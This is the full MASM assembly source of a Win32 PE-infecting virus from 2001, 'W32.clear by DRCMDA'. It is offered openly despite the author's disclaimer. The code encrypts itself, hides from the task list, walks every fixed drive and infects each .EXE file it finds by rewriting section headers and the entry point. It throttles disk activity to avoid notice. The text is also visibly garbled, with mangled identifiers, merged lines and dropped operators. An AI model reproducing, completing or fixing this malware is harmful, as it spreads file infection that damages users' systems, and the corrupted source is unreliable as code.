[W32.clear by DRCMDA]
; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-
Simple But Clear Win32 Pe Infector, Uses Simple XOR Encryption,
Mutexes and Directory Travesel (On Every Fixed Drive) ... i for
Myself Don't Like Virii But Since I Discovered The PE-HEADER I
; Just Wanted to Write ONE :) I Tried to Understand 100% of The
Techniques use for this purpose SO I wrote every in this
Virus on my own. I Also Tried to Optimize Common Structures Like
Infecting, Api-Base Searching, Dir-Scanning, ... I Would Never
Spread a Virus, I wrote this Just to Get a better grip with the
PE Header;) Hehe Bye ... - DRCMDA [DRCMDA@gmx.de] (c) 2001
; ------------------------------------------------- ----------------
; P L E A S E D O N o T C O m P i L E (A N D R u N!) T H i S
; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-
.486
.Model flat, stdcall
Option CaseMAP: NONE
INCLUDE /MASM32/INCLUDE / WANEL32.INC
INCLUDELIB /MASM32/LIB/kernel32.lib
Virus_size EQU Virus_END - Virus_Start
Max_path EQU 104H
Of_read equ 000h
GHND EQU 002H OR 040H
FILE_ATTRIBUTE_NORMAL EQU 080H
FILE_ATTRIBUTE_DIR EQU 010H
Drive_fixed EQU 003H
.Code
First_gen:
PUSH 0
Call EXITPROCESS
Virus_Start:
Pushhad
Call delta
Delta: POP EBP
Sub EBP, Delta; EBP = DELTA OFFSET
XOR_KEY: MOV DH, 0; WILL BE PATCHED ...
Lea ESI, [EBP E_START]; SO NO XOR EDX, EDX :)
PUSH ESI
MOV ECX, Virus_END - E_START
; _________________ _ _ _ [-Encrypt-] _ _ _ __
Encrypt: XOR BYTE PTR [ESI], DH; EN / DE-CRYPTS THE VIRUS_BDY
ROL DH, 1; Very Lame I Know ...
Inc ESI
Dec ECX
JNZ ENCRYPT
RET
E_START: CALL GET_KERNEL; GET KERNEL BASE
Mov ECX, 27
Lea ESI, [EBP ___kernel32] Call get_apis; get kernel API's
Call _m01
DB "Blablabla", 0
_M01: Push 1
PUSH 0
Call [_CREATEMUTEX]
Call [_getlasterror]
Test Eax, EAX
JNZ MUTEX_EXIST
Push 1
PUSH 0
Call [EBP _RSP]; Try to Hide from task-list
Call [EBP _GETCOMMANDLINE]; Start Real Host with Winexit
Push 1; Now the user won't notize
Push Eax; ANY Loading-Time Increase
Call [EBP _WINEXEC]
Call infect_everything; the name says all :)
PUSH 0
PUSH 0
Call [EBP _BEEP]
PUSH 0
Call [EBP _EXITPROCESS]; We're Done, The Entire Fucking
Computer shop be infected :)
Mutex_exist:
ERR_EXT: POPAD
Hreturn: Push DWORD PTR Offset First_gen; Return to Host
Ret; Will BE PATCHED LATER
; _________________ _ _ _ [-Get_kernel-] _ _ _ __
GET_KERNEL:; Returns the Kernel Base
MOV ECX, [ESP 9 * 4]; Simple But Small :)
@@: DEC ECX
Movzx EDX, Word PTR [ECX 03CH]; EDX = Pointer to PE_HDR
CMP ECX, [ECX EDX 034H]; Compare Current Base with
JNZ @B; The Kernel Image_Base (MZ)
MOV [EBP _KERNEL], ECX; Store Result
MOV [EBP _DEFAULT], ECX
RET
; ____________________ [-get_apis-] _ _ _ __
GET_APIS:; Scans Through API Table
INC ESI; and RETURNS Addresses
Push ECX
Call get_api; search Single API Address
POP ECX
Movzx EBX, Byte Ptr [ESI - 1]
Add ESI, EBX; Store Address in The
MOV [ESI], Eax; API Table ...
Add ESI, 4
Loop get_apis; Next One
RET
; _________________ _ _ _ [-gET_API-] _ _ _ __
GET_API:; Scans for a Single API ADR
MOV EDX, [EBP _DEFAULT]; EDX = Default Module Base
Add Edx, [EDX 03CH]; Offset PE_HEADER
MOV EDX, [EDX 078H]; EDX = PTR EXPORT_DIR RVAADD EDX, [EBP _DEFAULT]; BASE
MOV EDI, [EDX 020H]; EDI = PTR Address_of_names RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV EDI, [EDI]; EDI = PTR ADR_OF_NAMES RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV Eax, [EDX 018H]; EAX = Number_Of_Names
XOR EBX, EBX
NXT_ONE: INC EBX
Movzx ECX, Byte Ptr [ESI - 1]; LengHT of Spezifed API Name
PUSH ESI
Push EDI
Repz Cmpsb; Compare API Name with
POP EDI; Export Entry
POP ESI
JZ Found
Push EAX
XOR Al, Al
ScaSB; Get Next One
JNZ $ - 1
POP EAX
Dec EAX; Decrease Number_of_names
JZ Err_ext
JMP NXT_ONE
Found: MOV ECX, [EDX 024H]; ECX = PTR NBR_NAME_ORDS RVA
Add ECX, [EBP _DEFAULT]; BASE
Dec EBX
Movzx Eax, Word PTR [ECX EBX * 2]; EAX = Ordinal Of Function
MOV EBX, [EDX 01CH]; EBX = PTR ADR_OF_FUNCTIONS RVA
Add EBX, [EBP _DEFAULT]; BASE
MOV EAX, [EBX EAX * 4]; EAX = Function RVA !!!!
Add Eax, [EBP _DEFAULT]; BASE
RET
; _________________ _ _ _ [-infect_everything-] _ _ ___
Infect_everything:; Infects Every Fixed Drive !!!
Lea Eax, [EBP DRIVES];
MOV [EBP OFS], EAX; GET Drive Strings
Push EAX
Push 50
Call [EBP _GETLOGICALDRIVESTRINGS]
LOOP_: PUSH [EBP OFS]
Call [EBP _GETDRIVETYPE]; Is IT A Fixed Drive ???
CMP Eax, Drive_Fixed
Jnz Bahhh
Push [EBP OFS]
Call [EBP _SETCURRENTDIR]
Call infect_drive; let's infect it :)
Bahhh: add [eBP OFS], 4; Get Next Candidate
MOV EAX, [EBP OFS]
CMP Byte Ptr [EAX], 0
JNZ loop_
RET
; ____________________ [-infect_drive-] _ _ __INFECT_DRIVE:; Infects the Whole Drive :)
Lea EAX, [EBP W32Finddata];
Push EAX
Lea Eax, [EBP File_Mask]
Push EAX
Call [EBP _FINDFIRSTFILE]; Start Searching
INC EAX
JZ _S_OUT
Dec EAX
MOV [EBP S_HANDLE], EAX
_S_SCAN: CMP [EBP F_OATITRIBS], File_Attribute_dir
JNZ Nodir
CMP BYTE PTR [EBP FileName], "."; "." and ".." area.
JZ _next
Lea Eax, [EBP FileName]; IF We Found A Directory We set
Push Eax; Set The Cur Dir to this place and
Call [EBP _SETCURRENTDIR]; Continue The Search There ...
Push [EBP S_HANDLE]; Save Search Handle
Call infect_drive; recursive
POP [EBP S_HANDLE]; Get Old Handle and Continue
JMP _next
NODIR: Lea Eax, [EBP FileName]
Push EAX
Call [EBP _LSTRLEN]; EXCUSE my lazyness :)
CMP DWORD PTR [EBP FileName EAX - 4], "EXE."
JZ _1
CMP DWORD PTR [EBP FileName EAX - 4], "EXE."
JNZ _next
_1: CMP [EBP FileSizeh], 0; Only Files Under 4 GIGS ...
JNZ _next
Call Infect_file; Exe Found SO Infect It!
_Next: Push 100; Wait 100ms now the user shopn't
Call [EBP _SLEP]; Notize Any Disk-USAge ... (Hope So)
Lea Eax, [EBP W32FindData]
Push EAX
Push [EBP S_HANDLE]
Call [EBP _FINDNEXTFILE]; GRAB Search_Handle and Search
Test Eax, Eax; More Files That Are Matching To
JNZ _S_SCAN; OUR PATTERN ("*") ...
Lea Eax, [EBP Back]
Push EAX
Call [EBP _SETCURRENTDIR]; ".." Means Get One Dir Back
Push [EBP S_HANDLE]
Call [EBP _FINDCLOSE]
_S_OUT: RET
; ________________ _ _ _ [-Open_File-] _ _ ___infect_file:; Opens a File And Allocate Mem
Push file_attribute_normal; I don't use filemapping coz
Lea Eax, [EBP FileName]; I Simply Hate ... Imagine
Push Eax; You Map A File and Begin To
Call [EBP _SETFILEATTRIBUTES]; make the first changes, now
You realize the pe is not
Push of_read; valid or corrupted (Packed
Lea Eax, [EBP FileName]; Files or Some MS PE's
Push Eax; [Outlook]) ... this peh
Call [EBP __LOPEN]; be history now :) I buy it
MOV [EBP FILEHANDLE], EAX; Before and Must Say That
MOV EAX, [EBP FileSize]; I Had Tons of Problems with
Add [EBP MAPSIZE], EAX; THIS TECHNIQUE ...
Push [EBP MAPSIZE]
Push Ghnd
Call [EBP _GLOBALLOC]
MOV [EBP H_Buffer], EAX
Push EAX
Call [EBP _GLOBALLOCK]; Allocate Mem for the File
Test Eax, Eax; Virus_Body
JZ _exit
MOV [EBP M_BUFFER], EAX
Push [EBP FileSize]
Push [EBP M_Buffer]
Push [EBP FILEHANDLE]
Call [EBP __LREAD]; Read Entire File to Buffer
Push [EBP FILEHANDLE]
Call [EBP __LCLOSE]
; ____________________ [-infect_file-] _ _ ___
MOV EDI, [EBP M_Buffer]; EDI = Pointer to Mem Block
CMP Word PTR [EDI], "ZM"; Do Some Checks (MZ / PE / Infmark)
Jnz _exit
Add Edi, [EDI 03CH]; EDI = Pointer to PE_HDR
CMP Word PTR [EDI], "EP"
Jnz _exit
CMP DWORD PTR [EDI 04CH], 0
Jnz _exit
RETURN LAST Section
MOV ECX, [EDI 074H]; ECX = Number_Of_rva_and_sizes
LEA ECX, [ECX * 8 EDI]; x 8 offset pe_header
Movzx Eax, Word PTR [EDI 006H]; EAX = Number_Of_SectionsDec Eax; - 1
Lea EBX, [EAX EAX * 4]; EBX = EAX X 28H
Lea EBX, [EBX * 8]; ...
Lea EBX, [EBX ECX 078H]; EBX = EBX ECX 078H
MOV EAX, Virus_Size
XADD [EBX 008H], EAX; Change Virtualsize
CMP EAX, [EBX 010H]
Ja _exit
Push EAX
Push DWORD PTR [EBX 010H]
Add Eax, Virus_size
XOR EDX, EDX
MOV ECX, [EDI 03CH]
Div ECX
INC EAX
Imul Eax, ECX
MOV [EBX 010H], EAX; Change Size_OF_RAW_DATA
POP ECX
Mov Eax, [EBX 010H]
Sub Eax, Ecx; Change Size_OF_IMAGE
Add [EDI 050H], EAX
Change Attribs & Infmark
OR DWORD PTR [EBX 024H], 0C0000000H
MOV DWORD PTR [EDI 04CH], "BDHP"
POP EAX
Add Eax, [EBX 00CH]
XCHG [EDI 028H], EAX; Change Entry_Point
Add Eax, [EDI 034H]
MOV EDI, [EBX 014H]; Virus_POS = Virt_ADR
Add Edi, [EBX 008H]; Virt_size
MOV ECX, Virus_Size
Sub EDI, ECX
Add Edi, [EBP M_Buffer]
Lea ESI, [EBP VIRUS_START]
Rep Movsb; Write Virus_Body To Buffer
; _________________ _ _ _ [-close_File-] _ _ _ __
Add Byte PTR [EBP XOR_KEY 1], 10
MOV DH, BYTE PTR [EBP XOR_KEY 1]
MOV BYTE PTR [EDI - (Virus_END - XOR_KEY) 1], DH
MOV [EDI - (Virus_END - HRETURN) 1], EAX
Lea ESI, [EDI - (Virus_end - E_START)]
MOV ECX, Virus_END - E_START
Call Encrypt; Encrypt Virus_Body
Push 0; truncate file andoke
Lea Eax, [EBP FileName]; File for Write Access
Push Eax; (File Attribs Are Set Above)
Call [EBP __LCREAT]
INC EAX
JZ _exit
MOV EAX, [EBX 014H]; FileSize = Virt_ADR Add Eax, [EBX 010H]; SIZE_OF_RAW_DATA
Push EAX
Push [EBP M_Buffer]; Write Buffer To File ...
Push [EBP FILEHANDLE]; Close File ...
Call [EBP __LWRITE]; Get Rid of Those Memory
Push [EBP FILEHANDLE]; POINTERS AND FREE MEMORY ...
Call [EBP __LCLOSE]; SET OLD File Attributes
_Exit: push [EBP M_Buffer]
Call [EBP _GLOBALUNLOCK]
Push [EBP H_Buffer]
Call [EBP _GLOBALFREE]
Push [EBP F_OATITRIBS]
Lea EAX, [EBP FileName]
Push EAX
Call [EBP _SETFILEATTRIBUTES]
RET
; _________________ _ _ _ [-virus_Data-] _ _ _ __
___Kernel32:;
DB 06, "_ lopen"; API TABLE
__Lopen DD 0; Will BE Filled Up with ADR'S
DB 06, "_ loread"; from a spezifed module-export
__Lread DD 0; Table (in this case kernel32)
DB 07, "_ lwrite"
__LWRITE DD 0
DB 07, "_ lclose"
__Lclose DD 0
DB 07, "_ lcreat"
__Lcreat DD 0
DB 11, "GLOBALLOC"
_GlobalAlloc DD 0
DB 10, "GLOBALLOCK"
_Globalock DD 0
DB 12, "GlobalUnlock"
_Globalunlock DD 0
DB 10, "GlobalFree"
_GlobalFree DD 0
DB 13, "findfirstfile"
_Findfirstfile dd 0
DB 12, "findnextfile"
_FindNextFile DD 0
DB 09, "FindClose"
_FindClose DD 0
DB 17, "SetFileAttributes"
_SetFileAttributes DD 0
DB 17, "getFileAttributes"
_GetfileAttributes DD 0
DB 19, "setcurrentdirectory"
_SETCURRENTDIR DD 0
DB 22, "getLogicalDriveStrings"
_GetLogicalDriveStrings DD 0
DB 12, "getDriveType"
_GetdriveType DD 0
DB 07, "lstrlen"
_LSTRLEN DD 0
DB 04, "beep"
_Beep DD 0
DB 11, "CREATEMUTEX"
_Createmutex DD 0
DB 12, "ReleaseMutex"
_RELESEMUTEX DD 0
DB 12, "getLastError"
_Getlasterror DD 0
DB 11, "EXITPROCESS"
_Exitprocess DD 0
DB 22, "RegisterServiceProcess"
_RSP DD 0
DB 14, "getcommandline"
_GetCommandline DD 0
DB 07, "WINEXEC"
_Winexec DD 0
DB 05, "SLEEP"
_SLEEP DD 0
_Kernel DD 0; Base Placeholders
_Default DD 0
Mapize DD Virus_size 1000H
FileHandle DD 0
H_Buffer DD 0
M_Buffer DD 0
W32FindData:; Win32_Find_Data Struc
F_oattribs DD 0
DD 6 DUP (0)
FileSizeh DD 0
FILSIZE DD 0
DD 2 DUP (0)
FileName DB Max_Path Dup (0)
DB 14 DUP (0)
File_mask DB "*", 0
Drives DB 50 DUP (0)
BACK DB "..", 0
S_handle DD 0
OFS DD 0
Virus_end:
END VIRUS_START
